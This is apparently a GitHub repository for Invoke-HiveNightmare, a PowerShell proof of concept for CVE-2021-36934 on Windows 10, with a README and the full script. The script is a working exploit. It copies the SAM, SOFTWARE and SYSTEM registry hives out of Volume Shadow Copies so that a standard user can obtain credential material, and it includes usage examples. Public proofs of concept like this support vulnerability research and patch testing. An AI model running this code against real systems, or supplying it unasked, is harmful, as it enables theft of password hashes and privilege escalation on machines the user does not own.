├── PoC.gif ├── README.md └── Invoke-HiveNightmare.ps1 /PoC.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WiredPulse/Invoke-HiveNightmare/HEAD/PoC.gif -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Invoke-HiveNightmare 2 | PowerShell-based PoC for CVE-2021-36934, which enables a standard user to be able to retrieve the SAM, Security, and Software Registry hives in Windows 10 version 1809 or newer. 3 | 4 | # Situation 5 | In specific versions of Windows 10, standard users have read/execute rights to files in [SYSTEMROOT]\System32\Config directory, which is where the Registry hives reside on disk. One can't however, simply navigate to the directory and copy/paste as the hives are loaded and into memory upon system boot and are locked. A standard user can retrieve the hives from Volume Shadow Copies if they exist. 6 | 7 | # Demo 8 | ![ Alt text](https://github.com/WiredPulse/Invoke-HiveNightmare/blob/main/PoC.gif) / ! [](name-of-gif-file. gif) 9 | 10 | # Disclaimer 11 | The success of this exploit resides on the fact that Volume Shadows Copies exist... without them the code isn't useful. 12 | 13 | # Credits 14 | The vulnerability was discovered by @jonasLyk. 15 | -------------------------------------------------------------------------------- /Invoke-HiveNightmare.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | PoC for CVE-2021-36934, which enables a standard user to be able to retrieve the SAM, Security, and Software Registry hives in Windows 10 version 1809 or newer. 4 | 5 | The vulnerability was discovered by @jonasLyk. 6 | 7 | .PARAMETER path 8 | Used to supply the path to dump the Registry hives. If the parameter isn't used, the path will be default to the user's desktop. 9 | 10 | .EXAMPLE 11 | PS C:\> .\Invoke-HiveNightmare.ps1 -path "c:\" 12 | 13 | Dumps the hives from the system's Volume Shadow Copies to C:\. 14 | 15 | .EXAMPLE 16 | PS C:\> .\Invoke-HiveNightmare.ps1 17 | 18 | Dumps the hives from the system's Volume Shadow Copies to C:\users\[USERNAME]\desktop. 19 | 20 | .NOTES 21 | File Name : Invoke-HiveNightmare.ps1 22 | Version : v.0.2 23 | Author : @WiredPulse 24 | Created : 21 Jul 21 25 | #> 26 | 27 | [CmdletBinding()] 28 | param( 29 | $path = "C:\Users\$username\Desktop" 30 | ) 31 | 32 | $outSam = "$path\Sam.hive" 33 | $outSoft = "$path\Soft.hive" 34 | $outSys = "$path\Sys.hive" 35 | 36 | if(-not(test-path $path)){ 37 | new-item $path -ItemType Directory | out-null 38 | } 39 | 40 | if(([environment]::OSVersion.Version).build -lt 17763){ 41 | Write-Host -ForegroundColor red "[-] System not susceptible to CVE-2021-36934" 42 | pause 43 | break 44 | } 45 | else{ 46 | Write-Host -ForegroundColor yellow "[+] " -NoNewline; Write-Host -ForegroundColor green "System is a vulnerable version of Windows" 47 | } 48 | 49 | for($i = 1; $i -le 9; $i++){ 50 | try{ 51 | [System.IO.File]::Copy(("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $i + "\Windows\System32\config\sam"), ($outSam + $i)) 52 | Write-Host -ForegroundColor yellow "[+] " -NoNewline; Write-Host -ForegroundColor green "Dumping SAM$i hive..." 53 | } catch{} 54 | try{ 55 | [System.IO.File]::Copy(("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $i + "\Windows\System32\config\software"), ($outSoft + $i)) 56 | Write-Host -ForegroundColor yellow "[+] " -NoNewline; Write-Host -ForegroundColor green "Dumping SOFTWARE$i hive..." 57 | } 58 | catch{} 59 | try{ 60 | [System.IO.File]::Copy(("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $i + "\Windows\System32\config\system"), ($outSys + $i)) 61 | Write-Host -ForegroundColor yellow "[+] " -NoNewline; Write-Host -ForegroundColor green "Dumping SYSTEM$i hive..." 62 | } 63 | catch{} 64 | } 65 | if(test-path $path\s*.hive*){ 66 | Write-Host -ForegroundColor yellow "[+] " -NoNewline; Write-Host -ForegroundColor green "Hives are dumped to $path" 67 | } 68 | else{ 69 | Write-Host -ForegroundColor red "[-] There are no Volume Shadow Copies on this system" 70 | } 71 | --------------------------------------------------------------------------------